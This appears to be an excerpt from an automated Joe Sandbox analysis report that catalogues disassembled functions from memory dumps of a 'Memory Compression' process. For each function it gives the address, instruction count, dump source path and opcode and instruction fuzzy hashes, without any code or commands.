                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7f24952f67fdfe495239024675c7f940c7214552b9c46e00fb58b94a4bd9912e
                                      • Instruction ID: e2c823b7dd5dcace9aca9164c53d5ad8da45b4b86055da5b5c315b76e6f57d6c
                                      • Opcode Fuzzy Hash: 7f24952f67fdfe495239024675c7f940c7214552b9c46e00fb58b94a4bd9912e
                                      • Instruction Fuzzy Hash: 26514874D0861D8FEB54EB98C49A6FDBBF1FF59350F68007AD009E7292DA38A844CB41
                                      Function 00007FF886EBB6FD Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4b105aa95e1b48c4eca7e87f830ff4919af03735a5e2f6c67c31c9aa198d5f3e
                                      • Instruction ID: 4197da98c7596292d9df6462e56da110c6a490e4d3b4c83225bd8a7a852de180
                                      • Opcode Fuzzy Hash: 4b105aa95e1b48c4eca7e87f830ff4919af03735a5e2f6c67c31c9aa198d5f3e
                                      • Instruction Fuzzy Hash: 6B413B70D0865A8EEB54DB68C8457ED77F2FF58340F6882B5C009E3291DE78A985CB40
                                      Function 00007FF886EBC798 Relevance: .1, Instructions: 111COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0fbb1b38389030afa22198c3c79b9aaf13d7bceac376bf36a4e7e4061f328ba3
                                      • Instruction ID: a4831f778b61f6c65e7e3871390a60a1852b7c2b18d3a331eb69422aab0c65d5
                                      • Opcode Fuzzy Hash: 0fbb1b38389030afa22198c3c79b9aaf13d7bceac376bf36a4e7e4061f328ba3
                                      • Instruction Fuzzy Hash: 7531B671E1C91D9FEB94EB98D895AACB7B1FF58744F641139D00DE3292DE246C42CB40
                                      Function 00007FF886EBFA40 Relevance: .1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EBF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EBF000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ebf000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc47f48ab323fc6df69ae019ef9791ccf600ef8a1bef4ea9451ba666bf806fe9
                                      • Instruction ID: 5ae08aa53329c376ad77ecaeb6c3016d23de7a68afd67a45f02b9c7b14460e8d
                                      • Opcode Fuzzy Hash: bc47f48ab323fc6df69ae019ef9791ccf600ef8a1bef4ea9451ba666bf806fe9
                                      • Instruction Fuzzy Hash: 54412970E189198FDBA8EB189C997A9B7B1FF59341F5402E9C44DE3282DE346E81CF41
                                      Function 00007FF886EBC810 Relevance: .1, Instructions: 96COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: feac6e670ab78fd5da85864a4d4c40fdb128533022ec9255e34ea9b76c7e7d26
                                      • Instruction ID: 5be6661f78144fe0abf6be785d827bd85831f54ef9a5ee55fdbcafed65d004a9
                                      • Opcode Fuzzy Hash: feac6e670ab78fd5da85864a4d4c40fdb128533022ec9255e34ea9b76c7e7d26
                                      • Instruction Fuzzy Hash: 5821C970E1C91D8FEB94EBA8D8956ACB7B1FF59344F64153AD00DE3292DE246C42CB40
                                      Function 00007FF886EB0488 Relevance: .1, Instructions: 89COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 967944ec8e886d556195cecd1501df68ca0a8b9e79d597fb2add77ca6174f2a0
                                      • Instruction ID: 1a33b12306840b0d3d7e81d7021cde13b45bfd52d6a4c826231be37a12ce4cbd
                                      • Opcode Fuzzy Hash: 967944ec8e886d556195cecd1501df68ca0a8b9e79d597fb2add77ca6174f2a0
                                      • Instruction Fuzzy Hash: 4A21DE17A0D2924FE311B7ADF8A52E93F60DF9227970D41B3D1CC8D053DD0C684A97A6
                                      Function 00007FF886EB0805 Relevance: .1, Instructions: 88COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c45bc81c5559a32ef4d161a420ff0bdd0777ff7f9f87a1f85dcfcd8daef5026a
                                      • Instruction ID: e912a78284dd9db980c8723a406c8454dcb20597d0f3f9467cfdddb8ce1379d2
                                      • Opcode Fuzzy Hash: c45bc81c5559a32ef4d161a420ff0bdd0777ff7f9f87a1f85dcfcd8daef5026a
                                      • Instruction Fuzzy Hash: D4213B62E1C6829BE701667CDC5A2E97BA0FF51364F0C41B7D448E9083EE18A956C2D1
                                      Function 00007FF886EB3277 Relevance: .1, Instructions: 79COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aed05fcabafc3fcf0bd275d23a759a121336b12507da3099c3c6e3d82cbb8e44
                                      • Instruction ID: 9ee5ad10584c8c1e9c620096a077e6d616b2ddad557dd0d70198bd6ff1825033
                                      • Opcode Fuzzy Hash: aed05fcabafc3fcf0bd275d23a759a121336b12507da3099c3c6e3d82cbb8e44
                                      • Instruction Fuzzy Hash: DA21C275D0851D8FEB58DB98C49A6FDBBF1FF58341F64402AD00DE7291DA386880CB50
                                      Function 00007FF886EB2189 Relevance: .1, Instructions: 76COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f8e6ac0f615c8e14ff839d777aa71e8e649c58f67f2a86560386ad54a599a135
                                      • Instruction ID: 1e90b26bd68f63f18f0ca269b3530155a9d16e3aed472d5808de62265fe5dcf7
                                      • Opcode Fuzzy Hash: f8e6ac0f615c8e14ff839d777aa71e8e649c58f67f2a86560386ad54a599a135
                                      • Instruction Fuzzy Hash: 4911DF30E1855A4FE745EB74841A2B977E0EF4A380F5804B6D44DD74A3DE28A889C752
                                      Function 00007FF886EBAB41 Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 37fdd32e6dec9a301086e67e17770962b9ce7eba9b7935c6b7183de2cbc8a3d6
                                      • Instruction ID: 3fccbe597ca1df70bbe992b61ac4cad4097aec96bf131b3488272c9876e0a2de
                                      • Opcode Fuzzy Hash: 37fdd32e6dec9a301086e67e17770962b9ce7eba9b7935c6b7183de2cbc8a3d6
                                      • Instruction Fuzzy Hash: 21218E7091864D8FDF99EF28C499AAD3BF1FF28304F1501AAE819D7255CB34E840CB81
                                      Function 00007FF886EB339F Relevance: .1, Instructions: 74COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b5a13d0ea305c1bbb926ac37a491344150d408a0e662f991943d624217dcf66f
                                      • Instruction ID: 65284e4d0da2451d0d16e5a93572b0a3542d472d13e431aa97dfd8e7a689ac7c
                                      • Opcode Fuzzy Hash: b5a13d0ea305c1bbb926ac37a491344150d408a0e662f991943d624217dcf66f
                                      • Instruction Fuzzy Hash: BF21013080D69A8FDB42EB74885C6E97FF0FF0A350F0944FAD448CB062DA399846C711
                                      Function 00007FF886EC73E5 Relevance: .1, Instructions: 71COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a1334eeae73f3dc8c496bfb3f00cba4b591a9cd5464f89817ab54c3f6effd8a
                                      • Instruction ID: dc24757bae666cae4d6276e8d7ec645b8a08b460f3125573b95b8146187b9c30
                                      • Opcode Fuzzy Hash: 2a1334eeae73f3dc8c496bfb3f00cba4b591a9cd5464f89817ab54c3f6effd8a
                                      • Instruction Fuzzy Hash: 0221CD30D1864E9FEF98EF6884992BD7BA1FF28351F2401BEC81DC3192CA34A881C741
                                      Function 00007FF886EC4EC5 Relevance: .1, Instructions: 71COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea4b2fa20300efd4cf43b02b0c6273e976e7edd746600b59734a0940584816aa
                                      • Instruction ID: 48103562123949560f096fa16581492f799edc5e390dfd7ac9f7bb48057b9bd3
                                      • Opcode Fuzzy Hash: ea4b2fa20300efd4cf43b02b0c6273e976e7edd746600b59734a0940584816aa
                                      • Instruction Fuzzy Hash: 2921CF7091868E8FDB94EF68C4592F93BE0FF28301F2111BED81DC3592CA38A440C781
                                      Function 00007FF886EC2CB0 Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 11dde3a74d004733359e0e01742cce365f8a4dc88fa1a19d74809419a3b6f17e
                                      • Instruction ID: 8739a991e97c6348b9dbeead0a3be506c0bfebc675ded3c6a212856444dd76ae
                                      • Opcode Fuzzy Hash: 11dde3a74d004733359e0e01742cce365f8a4dc88fa1a19d74809419a3b6f17e
                                      • Instruction Fuzzy Hash: 6A11903085D7894FEB069B30886A2A57FB0FF16314F2604FBD449CB4D3DA2D5959C712
                                      Function 00007FF886EB0A01 Relevance: .1, Instructions: 68COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a5e5195efc835b714902d8316892f7a4f0a05a6689820cf9809d25f89d08d02
                                      • Instruction ID: 43eefe9d261fb7ed5e2ee9d5119c9668116fb2bf889b2ddff7b6b08154498767
                                      • Opcode Fuzzy Hash: 1a5e5195efc835b714902d8316892f7a4f0a05a6689820cf9809d25f89d08d02
                                      • Instruction Fuzzy Hash: 7F115B35E1855E8EE791EB68C8492AD77E0FF58390F5809B6C409E61A2EE38A944CB41
                                      Function 00007FF886EC2AA1 Relevance: .1, Instructions: 65COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ca28ebb5c1bf55de7e3b461c3ed58dcf04d1d13976b54ac6ab67d961e7ffe096
                                      • Instruction ID: 77559e677a30d1b71da62faabb9764534bf18dd521dba4cbf97db1cdc8cfd004
                                      • Opcode Fuzzy Hash: ca28ebb5c1bf55de7e3b461c3ed58dcf04d1d13976b54ac6ab67d961e7ffe096
                                      • Instruction Fuzzy Hash: 6E1190709286498FDB58DF14C8961F97BE1FF5C354F15027EE84AC3185CA38A850CB81
                                      Function 00007FF886EC7341 Relevance: .1, Instructions: 65COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c0b0da7c7b6db2d2548c3f2b390cd44a9f05c3732f6abc4ef5b70b145f56f494
                                      • Instruction ID: d75d6e501e0b047f85d5074acfef10c0c60e5d99c053576a205de09ca1b2a220
                                      • Opcode Fuzzy Hash: c0b0da7c7b6db2d2548c3f2b390cd44a9f05c3732f6abc4ef5b70b145f56f494
                                      • Instruction Fuzzy Hash: 5211903091864A9FDB98EF68849A2BE7BE1FF58341F1405BEC81DC7592CB38A840C741
                                      Function 00007FF886EC4D05 Relevance: .1, Instructions: 64COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3c4225721719e735e3587a165dc965334cb31a1c5d939b3fa1559ee38780c105
                                      • Instruction ID: 298ca24c9c762bcb41864690d9149d4fe147cecd6666345963e6b096524d4250
                                      • Opcode Fuzzy Hash: 3c4225721719e735e3587a165dc965334cb31a1c5d939b3fa1559ee38780c105
                                      • Instruction Fuzzy Hash: 71118E70918A4A9FDB89EF68845A2BE7BA0FF58341F1405BED41DC7992CA38A580CB41
                                      Function 00007FF886EC7AD1 Relevance: .1, Instructions: 62COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1fc43cf2be40fcf7c671a312dcf6a85d03db1446c8ad8ef7577a331b446b528b
                                      • Instruction ID: 4af9ee274e1162c8bc137503f6e94ae45205ca67c9be0df36483903e05a95fb3
                                      • Opcode Fuzzy Hash: 1fc43cf2be40fcf7c671a312dcf6a85d03db1446c8ad8ef7577a331b446b528b
                                      • Instruction Fuzzy Hash: BA118230E1C55A8FEB41EB78C8886AA7BF1FF59380F1409B6D419C7055DE38E990C751
                                      Function 00007FF886EB112D Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0fe71baab67eabe4a85eed27f1708a8717099233bc36dc5c585a557a9fff8449
                                      • Instruction ID: 1ab8d45c5744d7e8a6f6a466b43fc5c70f373c0cb24f395bda911202a0b7ecdf
                                      • Opcode Fuzzy Hash: 0fe71baab67eabe4a85eed27f1708a8717099233bc36dc5c585a557a9fff8449
                                      • Instruction Fuzzy Hash: D611E270D1865A8EEB599B6884583F97BF0FF69360F2804BEC40AE71D2DE356848C741
                                      Function 00007FF886EC4C69 Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d4eadf13ece0be1d0a65b02d204a237fa739beb7718326bc7d53f052394c68dc
                                      • Instruction ID: 8a9c64f7d16c6518489823a5bc7b4bdb0106610848e5d5f277aaa5ebbdaa3ee2
                                      • Opcode Fuzzy Hash: d4eadf13ece0be1d0a65b02d204a237fa739beb7718326bc7d53f052394c68dc
                                      • Instruction Fuzzy Hash: 7A11B13090D64A9FEB85EF68C4556B97BE0FF59341F2405BEC41DCB5A2CA38A884C741
                                      Function 00007FF886EC7505 Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc70d865fdf291fdff05ac4d4bb52db2ad32705006e5c8f994e96fe3cc6e4d6a
                                      • Instruction ID: cb23e916a96c808f1e1ad952bea9ef71d86505bd875a305eea28d0ff5d25ed0d
                                      • Opcode Fuzzy Hash: fc70d865fdf291fdff05ac4d4bb52db2ad32705006e5c8f994e96fe3cc6e4d6a
                                      • Instruction Fuzzy Hash: BA112370D2DA898BEF99DB6488E52B87BE0FF14300F1400BED10EC61E2CE295844C742
                                      Function 00007FF886EC5229 Relevance: .1, Instructions: 59COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 01166e14d3f2514f6fe134988d0fefbe30c2b071345308027cb82f1abb7b66d2
                                      • Instruction ID: 2bfa079323bbc5678cbabcfe7b2ab27f40570e53faf0ff74e779c8b09c7a71c1
                                      • Opcode Fuzzy Hash: 01166e14d3f2514f6fe134988d0fefbe30c2b071345308027cb82f1abb7b66d2
                                      • Instruction Fuzzy Hash: 6C11E370D1DA898FDB5ADA6488A62B93BF0FF66350F1504FEC00EC7593CA286851C702
                                      Function 00007FF886EBCF80 Relevance: .1, Instructions: 58COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c539a59ee582583490d7c237c8275240114656e51905e865f1f88b70076302f
                                      • Instruction ID: 1a3479ea86d9db6fba59bfbb4eb1946d953b66837f3edd39ef16438faad760dc
                                      • Opcode Fuzzy Hash: 8c539a59ee582583490d7c237c8275240114656e51905e865f1f88b70076302f
                                      • Instruction Fuzzy Hash: 2711913091C69E8FEB46EB6888182B97BF0FF19344F2808FAD419D7192DE749950C751
                                      Function 00007FF886EC5599 Relevance: .1, Instructions: 58COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2b92e108ca451e3056c7319de1738a28f0c4a73097b3ad978b14593c63764655
                                      • Instruction ID: cd22246e279bfc63cfd0fdebc11f1bbb86a2e011d94d2742563ab26427fe4160
                                      • Opcode Fuzzy Hash: 2b92e108ca451e3056c7319de1738a28f0c4a73097b3ad978b14593c63764655
                                      • Instruction Fuzzy Hash: 4F11907092868E8FEB56EB6488592BD7BE0FF29341F1404BAD419C7192DE78A850C702
                                      Function 00007FF886EC759D Relevance: .1, Instructions: 57COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 62cdca26eb33b35a8f6656dd0ceeeffa86ffdc4abefa8281d8850fbe558044ed
                                      • Instruction ID: 18b55694fff1b36b0832b6eeb09f97dab0978524c8e63c8c3cd2115c52c6a8e4
                                      • Opcode Fuzzy Hash: 62cdca26eb33b35a8f6656dd0ceeeffa86ffdc4abefa8281d8850fbe558044ed
                                      • Instruction Fuzzy Hash: F411C43091864A8FEF59DF1884992F97BA0FF68350F1401BAD40DC3192CE38A840C741
                                      Function 00007FF886EC1451 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f20af645d3a03591735ec92b36d84baac99695b4e3793633c5224d9b5be4191
                                      • Instruction ID: e69dde2622faf7cd46edcc2cec199577d1dee7bf6b29a5a579581ee5362344e4
                                      • Opcode Fuzzy Hash: 4f20af645d3a03591735ec92b36d84baac99695b4e3793633c5224d9b5be4191
                                      • Instruction Fuzzy Hash: A1118B30928A4E8FEB94EF68C4692FD7BE0FF18345F2405BED419C3191DA38A941C701
                                      Function 00007FF886EB0F58 Relevance: .1, Instructions: 55COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 464d1ec187c4ad04f950cc7c25d6aa64f23877e19f1e4270f4dda728c6dbcb5f
                                      • Instruction ID: 91d90a185c41731d54d681baf484bc2934c62e9d5e48a0942ac342e9d8671a8c
                                      • Opcode Fuzzy Hash: 464d1ec187c4ad04f950cc7c25d6aa64f23877e19f1e4270f4dda728c6dbcb5f
                                      • Instruction Fuzzy Hash: C5115431E19A0A8AEB55EB54C855BEDB7A1FF54350F344279C009B7195CE387D42CB84
                                      Function 00007FF886EC2EA1 Relevance: .1, Instructions: 55COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30b7240fa372c5e074225148ac3d39bdbf97d69dbcc7343b25c3757dadcfb915
                                      • Instruction ID: 7975cbf337bf85253d48b0c5bfda3c79c2e052974a666ba713c79f1a3bdd8bfe
                                      • Opcode Fuzzy Hash: 30b7240fa372c5e074225148ac3d39bdbf97d69dbcc7343b25c3757dadcfb915
                                      • Instruction Fuzzy Hash: 4701B13092865A9FE782EBB8844D6FA7BE0FF0A340F2449B6D41CD7052DE38A581C701
                                      Function 00007FF886EB34C5 Relevance: .1, Instructions: 54COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886eb0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 51baedfedeec129f7b1630beb3294be1ec2122713e49212008d93a28fbe914a1
                                      • Instruction ID: 00283fce5c56df459f1ecfd69ef2d6a5067bea56b5a0950e51b3e159f997c73f
                                      • Opcode Fuzzy Hash: 51baedfedeec129f7b1630beb3294be1ec2122713e49212008d93a28fbe914a1
                                      • Instruction Fuzzy Hash: C6118E7091864E8FDB95EF64885A6BD7BF0FF18340F5404BED419D7192DB39A940CB01
                                      Function 00007FF886EC534D Relevance: .1, Instructions: 54COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c052f564cba2a7c5636d67724df816419be1a54351c729e74067c807a429b24f
                                      • Instruction ID: 9dfb114721afc9d60b980197abb4031b840a5607921ab50f85fa1c628fac1b58
                                      • Opcode Fuzzy Hash: c052f564cba2a7c5636d67724df816419be1a54351c729e74067c807a429b24f
                                      • Instruction Fuzzy Hash: 1C119E7091964E8FEB99EB6884596BE7BE0FF28340F1405BEC41DC7596CE38A451C702
                                      Function 00007FF886EC6639 Relevance: .1, Instructions: 54COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.1538442753.00007FF886EC4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EC4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ff886ec4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f5474869c0a19b84d58d122d85694b8676af0633cddb140fe1003bfaa06cb49b
                                      • Instruction ID: ebeaaeb2bfcc578196ead964a138d4029ebfff8dbc76b0867bd8ea4e1f193ba2
                                      • Opcode Fuzzy Hash: f5474869c0a19b84d58d122d85694b8676af0633cddb140fe1003bfaa06cb49b
                                      • Instruction Fuzzy Hash: ED11737092DA4A8FE751EB7485596BA7BE0FF19340F1505BAC448C7163DE38A944C702
                                      Function 00007FF886EB2E31 Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
